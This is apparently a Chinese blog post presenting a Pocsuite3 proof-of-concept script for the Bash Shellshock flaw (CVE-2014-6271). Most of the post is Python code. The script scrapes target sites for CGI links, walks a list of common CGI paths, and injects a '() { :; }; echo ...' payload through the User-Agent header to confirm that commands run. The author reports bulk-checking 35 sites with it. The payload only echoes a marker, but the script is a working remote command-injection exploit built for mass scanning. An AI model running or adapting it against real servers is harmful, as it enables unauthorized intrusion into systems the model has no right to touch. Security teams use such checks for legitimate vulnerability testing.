• Pocsuite3--编写破壳CVE-2014-6271_Shellshock的POC


    前言

    编写破壳CVE-2014-6271_Shellshock的POC,把公开出来的路径封装起来,作为Pocsuite3的验证POC

    情况1:网站无法访问,返回失败

    情况2:网站可以访问,无漏洞

    情况3:网站可以访问,有漏洞

    优先获取网站本身的cgi路径,如果没有,就用自带的cgi路径测试。

    代码

    实测效果:15 分钟内完成了 35 个站点的批量验证。

    #!/usr/bin/env python
    # coding: utf-8
    import random
    import re
    import string
    from posixpath import normpath
    from urllib.parse import urljoin, urlparse, urlunparse

    from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, logger
    
    # Candidate CGI paths commonly exposed by Shellshock-vulnerable servers.
    # NOTE(review): the name shadows the builtin `dict`; it is kept because
    # DemoPOC._verify references it by this name. Duplicate entry
    # "/cgi-mod/index.cgi" (listed twice in the original) removed so each
    # path is only requested once per target.
    dict = ["/cgi-bin/load.cgi",
            "/cgi-bin/gsweb.cgi",
            "/cgi-bin/redirector.cgi",
            "/cgi-bin/help.cgi",
            "/cgi-bin/about.cgi",
            "/cgi-bin/vidredirect.cgi",
            "/cgi-bin/click.cgi",
            "/cgi-bin/details.cgi",
            "/cgi-bin/log.cgi",
            "/cgi-bin/viewcontent.cgi",
            "/cgi-bin/content.cgi",
            "/cgi-bin/admin.cgi",
            "/cgi-bin/webmail.cgi",
            "/cgi-bin/authLogin.cgi",
            "/cgi-sys/entropysearch.cgi",
            "/cgi-sys/defaultwebpage.cgi",
            "/cgi-mod/index.cgi",
            "/cgi-bin/poc.cgi",
            "/cgi-bin/test.cgi"
            ]
    
    class DemoPOC(POCBase):
        """Verification POC for Shellshock (CVE-2014-6271).

        Sends the classic '() { :; }; echo ...' payload in the User-Agent
        header to a list of candidate CGI paths and checks whether the
        injected echo marker comes back as the first line of the body.
        """
        vulID = '0'
        version = '1'
        author = 'shenyi'
        vulDate = '2014-10-16'
        createDate = '2014-10-16'
        updateDate = '2014-10-16'
        references = ['https://www.invisiblethreat.ca/2014/09/cve-2014-6271/']
        name = 'Bash 4.3 远程命令执行漏洞 POC'
        appPowerLink = 'http://www.gnu.org/software/bash/'
        appName = 'Bash'
        appVersion = '3.0-4.3#'
        vulType = 'Command Execution'
        desc = '''
                Bash 在解析环境变量时,会解析函数,同时可以运行函数后的语句,造成命令执行。
                '''
        samples = []
        install_requires = []


        def _verify(self):
            """Probe candidate CGI paths; report the first vulnerable URL."""
            result = {}
            vul_url_result = ""  # URL confirmed vulnerable (empty => none found)
            try:
                vul_url = get_url_need(self.url)

                # Work on a copy: the original did dict.insert(0, ...) on the
                # shared module-level list, so it grew with every target scanned.
                candidate_paths = list(dict)
                if not vul_url:                              # target unreachable: fail immediately
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_url_result
                    return self.parse_output(result)
                elif vul_url.endswith("/123456_test.cgi"):   # sentinel: no CGI link scraped, use built-ins
                    pass
                else:                                        # a scraped .cgi/.sh link: try it first
                    candidate_paths.insert(0, vul_url)

                # Random marker so a coincidental reflection cannot produce
                # a false positive.
                random_str = ''.join(random.sample(string.ascii_letters + string.digits, 50))
                headers_fake = {}
                headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str
                for url_path in candidate_paths:
                    try:
                        # Scraped links are already absolute URLs (see
                        # get_link/getAbsoluteURL); only dictionary paths
                        # need to be joined onto the target.
                        if url_path.startswith('http'):
                            test_url = url_path
                        else:
                            test_url = self.url + url_path
                        response = requests.get(test_url, headers=headers_fake)
                        response = response.text
                        # Vulnerable servers execute the injected echo, so the
                        # marker appears as the first line of the response body.
                        if 'X-Bash-Test: %s' % random_str == response.split('\n')[0]:
                            vul_url_result = test_url
                    except Exception:
                        # Per-path failures (timeouts, resets) are expected;
                        # keep probing the remaining paths.
                        pass
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url_result
            except Exception as e:
                logger.exception(e)
            return self.parse_output(result)

        def parse_output(self, result):
            """Convert the result dict into a pocsuite3 Output object."""
            output = Output(self)
            # .get() chain: if _verify failed before filling VerifyInfo the
            # original raised KeyError here instead of reporting failure.
            if result.get('VerifyInfo', {}).get('URL'):
                output.success(result)
            else:
                output.fail('target is not vulnerable')
            return output

        def _attack(self):
            # The check is non-destructive, so attack == verify.
            return self._verify()

        def _shell(self):
            pass
    
    
    def get_url(url):
        """Follow redirects and return the final URL for *url*.

        On any request failure the input URL is returned unchanged
        (best-effort normalization).
        """
        try:
            return requests.get(url).url
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # still propagate; request failures fall back to the original URL.
            return url
    
    
    
    def get_url_need(url):
        """Pick the URL that _verify should probe for a target.

        Returns:
            - the URL itself when it already points at a .cgi/.sh script;
            - a .cgi/.sh link scraped from the target's homepage, if any;
            - url + '/123456_test.cgi' as a sentinel meaning "no link found,
              fall back to the built-in dictionary";
            - '' when the target cannot be reached at all.
        """
        if not url.startswith('http'):
            url = 'http://%s' % url
        # Already a CGI/shell script URL: probe it directly.
        if url.endswith('.cgi') or url.endswith('.sh'):
            return url
        # Confirm the host answers HTTP (follow redirects to the final URL).
        try:
            url = requests.get(url, timeout=10).url
        except Exception:
            # Unreachable target: use the module logger instead of print().
            logger.error("error : {}".format(url))
            return ""
        # Try to scrape a same-domain .cgi/.sh link from the homepage.
        url_need = get_link(url)
        # No link found: return the sentinel recognized by DemoPOC._verify.
        if not url_need:
            url_need = url + "/123456_test.cgi"
        return url_need
    
    
    def get_link(url):
        """Scrape the page at *url* for the first live, same-domain link
        ending in .cgi/.sh/.pl; return '' when none is found or on error.
        """
        rnt = ''
        try:
            page_content = requests.get(url).text
            # href/src/action attributes pointing at CGI/shell/perl scripts.
            # The original pattern had lost its backslashes (blog scrape):
            # `s*?` matched a literal 's' and `.` matched any character;
            # restored to `\s*?` and `\.`.
            match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', page_content)
            for item_url in match:
                if not item_url.startswith('http'):
                    # Relative link: resolve it against the page URL.
                    item_url = getAbsoluteURL(url, item_url)
                if not is_url_exist(item_url):
                    continue
                if isSameDomain(item_url, url):
                    rnt = item_url
                    break
            return rnt
        except Exception:
            # Any scrape failure degrades to "no link found".
            return rnt
    
    
    def getAbsoluteURL(base, url):
        """Resolve *url* against *base* and normalize the path component
        (collapse './', '../' and duplicate slashes).
        """
        # Local imports: the module never imported these names, so this
        # function raised NameError whenever it was called.
        from posixpath import normpath
        from urllib.parse import urljoin, urlparse, urlunparse

        resolved = urljoin(base, url)
        parts = urlparse(resolved)
        # URL paths always use '/', so normalize with posixpath
        # (os.path.normpath would produce '\\' separators on Windows).
        path = normpath(parts.path)
        return urlunparse((parts.scheme, parts.netloc, path, parts.params, parts.query, parts.fragment))
    
    
    def is_url_exist(url):
        """Return True when *url* answers with anything other than HTTP 404.

        The original returned True *only* on 404, which inverted the check:
        get_link() would then keep dead links and drop the live ones.
        """
        try:
            resp = requests.get(url)
            if resp.status_code != 404:
                return True
        except Exception:
            # Connection failure => treat the URL as non-existent.
            pass
        return False
    
    
    def isSameDomain(url1, url2):
        """Return True when both URLs share the same hostname (ports ignored)."""
        # Local import: urlparse was never imported at module level, so this
        # function raised NameError (silently swallowed into False below).
        from urllib.parse import urlparse
        try:
            host1 = urlparse(url1).netloc.split(':')[0]
            host2 = urlparse(url2).netloc.split(':')[0]
            return host1 == host2
        except Exception:
            return False
    
    
    # Register this POC class with the pocsuite3 framework so the CLI can
    # discover and run it.
    register_poc(DemoPOC)
    
  • 相关阅读:
    利用线程池爬虫
    多任务协程怎么写
    利用协程多任务协程爬取前几页投诉网
    cookie的处理和代理池的建立
    bs4和xpath的用法
    怎么使用Ip代理词
    雪球网新闻标题的爬取
    爬虫学习的基础篇
    小说文本爬取
    24 张图彻底弄懂九大常见数据结构
  • 原文地址:https://www.cnblogs.com/17bdw/p/10926431.html
Copyright © 2020-2023  润新知